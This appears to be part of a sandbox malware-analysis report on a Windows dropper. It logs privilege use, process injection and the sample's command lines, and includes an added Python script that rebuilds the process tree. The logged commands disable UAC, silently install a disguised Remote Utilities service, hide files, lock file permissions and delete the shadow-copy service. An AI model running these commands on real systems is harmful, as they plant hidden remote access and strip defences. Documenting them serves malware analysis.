N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 281477286448623 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 133908091709292702 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215507984765782 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 1374389534720 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 313612292914425336 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 53172266348 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 6937813002834471071 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215380712805364 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 11682311077888 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215432252412916 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215432252412916 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 342104659285993056 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215522446726132 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 51539607552 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 313565634309718272 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 51539607552 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 281477286448623 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 51539607552 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 313565632316571904 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 6937813002834471071 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 580215273388954615 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 79674864 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 8796172680096 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 342200935193249148 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 17179869189 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 2533489538760714 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 868727105659787095 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 77389068136 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 1058 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 34393294800 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 8589934592 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 120259084316 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
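
Added example, written for this edit and not taken from the report or the sample: rebuilding the process tree from the "PID A wrote to memory of B" rows of the WriteProcessMemory table that follows. The embedded rows are copied from that table; the function names are assumptions for the example. The report logs three identical rows per process creation, so the parser keys on the (parent, child) PID pair. Two things fall out that the flat table hides: the chain LtHv0O2KZDK4M637.exe -> wini.exe -> WScript.exe -> cmd.exe that launches regedit.exe, timeout.exe, attrib.exe, sc.exe and rutserv.exe, and a rutserv.exe instance (PID 5320) that spawns rfusclient.exe but has no recorded parent. A root with no recorded parent is a process whose creation the hooks did not observe; for a service binary that appears after sc.exe calls, a start by the Service Control Manager is the usual explanation, which is an interpretation and not something the table states. rutserv.exe and rfusclient.exe are the Remote Utilities (RMS) service and client binaries, matching the rms tag on this report, and the same rutserv.exe path is the one requesting SeDebugPrivilege and SeTcbPrivilege in the table above.

```python
"""Rebuild the execution chain from flattened "PID A wrote to memory of B" rows.

Added example written for this edit; the sample rows are copied from the
report's WriteProcessMemory table, nothing else here is the sample's code."""
import re

# Constructed sample: rows copied from the report. Each process creation is
# logged three times; parse_edges collapses the duplicates.
SAMPLE_ROWS = r"""
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
"""

# Process and Target columns both start with a drive letter; the lazy group
# stops at the first " X:\" that follows the parent image.
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S.*?) ([A-Za-z]:\\\S.*)$")


def parse_edges(rows):
    """Map (parent_pid, child_pid) -> (parent_image, child_image); first sighting wins."""
    edges = {}
    for line in rows:
        m = ROW.match(line.strip())
        if m:
            ppid, cpid, pimg, cimg = m.groups()
            edges.setdefault((int(ppid), int(cpid)), (pimg, cimg))
    return edges


def build_tree(edges):
    """Return (children-by-pid, image-by-pid) built from the edge map."""
    children, image = {}, {}
    for (ppid, cpid), (pimg, cimg) in edges.items():
        image.setdefault(ppid, pimg)
        image.setdefault(cpid, cimg)
        children.setdefault(ppid, []).append(cpid)
    return children, image


def roots(edges):
    """PIDs that wrote to others but were never written to: the chain origin,
    plus any process whose creation the hooks did not observe."""
    parents = {p for p, _ in edges}
    kids = {c for _, c in edges}
    return sorted(parents - kids)


def ancestry(edges, pid):
    """PIDs from the recorded root down to `pid` (cycle-safe)."""
    parent = {c: p for p, c in edges}
    chain = [pid]
    while chain[-1] in parent and parent[chain[-1]] not in chain:
        chain.append(parent[chain[-1]])
    return chain[::-1]


def render(children, image, pid, depth=0, out=None):
    """Indented text tree rooted at `pid`, one line per process."""
    out = [] if out is None else out
    out.append("  " * depth + f"{image.get(pid, '?')} (PID {pid})")
    for child in children.get(pid, []):
        render(children, image, child, depth + 1, out)
    return out


if __name__ == "__main__":
    edges = parse_edges(SAMPLE_ROWS.splitlines())
    children, image = build_tree(edges)
    for root in roots(edges):
        print("\n".join(render(children, image, root)))
        print()
    names = [image[p].rsplit("\\", 1)[-1] for p in ancestry(edges, 5764)]
    print("rutserv.exe (PID 5764) lineage:", " -> ".join(names))
```

Running the script prints one tree per root; a second tree whose root is a binary the first tree also spawned (rutserv.exe here) is the cue to look at the sc.exe invocations and the service configuration rather than at another dropper.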

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 5188 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4404 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 1776 wrote to memory of 4484 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 5956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 5764 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 5188 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\ProgramData\install\sys.exe
PID 4716 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 4716 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Windows\rutserv.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 5172 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 3336 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 3336 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 5320 wrote to memory of 3336 N/A C:\ProgramData\Windows\rutserv.exe C:\ProgramData\Windows\rfusclient.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 5732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 1112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 1112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 1112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4716 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4484 wrote to memory of 1448 N/A C:\ProgramData\Windows\winit.exe C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 1448 N/A C:\ProgramData\Windows\winit.exe C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 1448 N/A C:\ProgramData\Windows\winit.exe C:\Windows\SysWOW64\cmd.exe
PID 1448 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1448 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1448 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 5172 wrote to memory of 5380 N/A C:\ProgramData\Windows\rfusclient.exe C:\ProgramData\Windows\rfusclient.exe
PID 5172 wrote to memory of 5380 N/A C:\ProgramData\Windows\rfusclient.exe C:\ProgramData\Windows\rfusclient.exe
PID 5172 wrote to memory of 5380 N/A C:\ProgramData\Windows\rfusclient.exe C:\ProgramData\Windows\rfusclient.exe
PID 5188 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe C:\programdata\install\cheat.exe

System policy modification

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe

"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\ProgramData\install\sys.exe

C:\ProgramData\install\sys.exe

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

